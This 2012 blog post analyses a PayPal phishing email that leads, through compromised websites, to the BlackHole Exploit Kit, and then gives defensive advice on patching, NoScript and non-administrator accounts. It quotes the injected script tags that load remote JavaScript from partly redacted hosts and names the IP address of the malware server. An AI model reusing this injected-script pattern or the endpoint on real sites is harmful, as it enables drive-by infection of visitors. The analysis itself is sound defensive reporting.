Anatomy of a PayPal email scam leading to malware
May 24, 2012
Cyber-criminals are once again ramping up their email scam campaigns to deliver messages with links to malware servers they control. One of the recent scams, happening this week, is a PayPal Payment scam, with links leading to an exploit attack kit.
The most recent PayPal scam arrives in your Inbox with the Subject: "You sent a payment" and a spoofed From address: "[email protected]" <[email protected]>
. However, if you were to take a look at the actual normally hidden Header information, you would see that the email came from some other non-related website. The PayPal scam I am looking at came from Brazil:
Received: from [187.56.96.53] (helo=telesp.net.br).
See my article from 2006 for suggestions on how to display email headers.
The PayPal scam message body text is meant to both poke the curiosity of the recipient (by the dollar amount they allegedly sent) and to delay their checking into their PayPal accounts to see if they did make such a payment. Here is how the crooks accomplish these important tasks:
You sent a payment Transaction ID: 2T004487YM209135A
Dear PayPal User, You sent a payment for $334.85 USD to Otis Bauer (or another name). Please note that it may take a little while for this payment to appear in the Recent Activity list on your Account Overview...This payment was sent using your bank account.By using your bank account to send money...
The call to action that they want victims to perform is NOT to login to their PayPal accounts to investigate this scam (See italicized sentence above), but to click on poisoned links provided amount keywords in the email message body. These inks are wrapped around every word that a PayPal user might normally expect to be available for seeing details about their accounts. The linked words were as follows:
- 2T004487YM209135A
- View the details of this transaction online
- Help Center | Resolution Center | Security Center
- h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_history (not URL in link)
- h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us (not URL in link)
Each one of the above anchor words were wrapped by a link to a compromised website that contained the following contents (placed there when they got hacked):
WAIT PLEASE
Loading...
<script type="text/javascript" src="h**p://REMOVED.com.tr/fu25e3pr/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED-epices.com/X1RrZw4G/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED.com.au/Xsqgw1AK/js.js"></script>
Each of the links on the compromised website is a JavaScript include, which is drawn from the URL I removed and imported as JavaScript Includes, into the browser of the victim. Once the first active URL in those 3 files loads (some may have been taken offline, or cleaned), it loads another JavaScript code that redirects your browser to another URL, which is hard-coded into that script. In the case being analyzed that poisoned link goes to:h**p://69.194.196.44/showthread.php?t=4a6d866826776084
(DO NOT GO THERE!).
Whois 69.194.196.44?
Answer: Solar VPS, in Rutherford, NJ, USA.
What happens when you are redirected to this VPS server? You get attacked by the BlackHole Exploit Kit, which first and foremost probes for any exploitable versions of Java on your computer.
How can one protect themselves from such exploits?
Your first line of defense should be your own hand, in which your pointing device is activated. Whether you use a traditional mouse, trackball, fingertip mouse-pad, stylus, or touch-screen, always allow the pointer to hover over links before you actively click on them! All modern browsers will automatically display the actual URL of a link as you hover over it. All standalone desktop email clients have an option to show or hide the Status Bar. I always show my Status bar.
If you use Microsoft Windows Live Mail (WLM) as your email client, and you don't see a Status Bar along the bottom of its window, click on the tab labeled VIEW (under the title bar, listed among Home | Folders | View| Accounts). Look to the right of the options and buttons that appear under the View tab and find the one labeled "Status bar" and click on it. The Status bar will instantly appear on the bottom of the WLM window. If you preview your emails (View - "Preview" or "Reading" Pane). Even if you don't use the Reading Pane, once you open an email message and hover over links in it, the URLs will be displayed in the Status bar of that opened email message. Fortunately, that Status bar is not turned off even if the main interface has its Status bar off.
Another way you can protect yourself from being exploited in case you accidentally do click on a poisoned link, is by using the Firefox browser, along with the NoScript Add-on. I operate this way. NoScript is an extension that one can manually install into the Firefox browser. It disables JavaScript and other active content by default. You have to actively instruct it to allow this or that website or URL to allow scripting to be rendered. You can do this permanently, or temporarily. Chances are very minute that you will have white-listed one of the domains that have been compromised by the criminals running these BlackHole scams. Therefore, should you click on a hostile link that leads to a JavaScript Include that redirects to a malware server, you may see the "Please Wait, Loading" message, but nothing more will happen (Yes, I have checked this out).
Even if you go directly to the BlackHole exploit server, nothing will happen if you have JavaScript disabled. But, since the majority of people browsing the Internet do not block JavaScript, "stuff" may well happen to you if you go there.
The BlackHole Exploit Kit first attacks Java technology, if present (see: Do I have Java installed?). Java is NOT the same as JavaScript. They are horses of a different color. Java is like an executable, in that it is compiled into an Applet that can run on its own. JavaScript is an interpreted language that normally operates only in web browsers, or special browser emulators used by developers, or in Adobe Reader and Acrobat, or certain other specialized applications. If your computer, or hand held device has any out-dated version of Java installed, you can be taken over by the BlackHole Exploit Kit.
If you either do not have Java installed, or only have the most recent version, which has been patched against known vulnerabilities, the BlackHole Kit might probe your for an out-dated version of Adobe Flash or Reader. It really depends on which version of the BlackHole kit you are lured to, as the one I am looking at today only targets Java. Some email scams have links to the Phoenix Exploit Pack, which definitely includes Flash, Reader and ActiveX attacks, in addition to Java. This means you have to make sure that you stay up-to-date with patching all plug-ins that are accessed through a web browser.
Thankfully, Oracle's Java, Adobe's Flash and Reader and Apple's Quicktime plug-ins all have an optional automatic check for updates feature. I strongly advise you to enable those automatic updates and have them both downloaded and installed as they become available.
Finally, if you now operate your computer with Administrator privileges, read my articles [1] [2] [3] about lowering your privileges to the Limited, Power, or Standard User level instead. This will significantly reduce your likelihood of being successfully exploited by means of a drive-by attack. Yes, you could be tricked into agreeing to install a Trojan, by cleverly worded social engineering tactics. But, at least you would have a chance to see it coming and stop it, whereas with Administrator privileges, the malware could just walk on in and sit right down.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.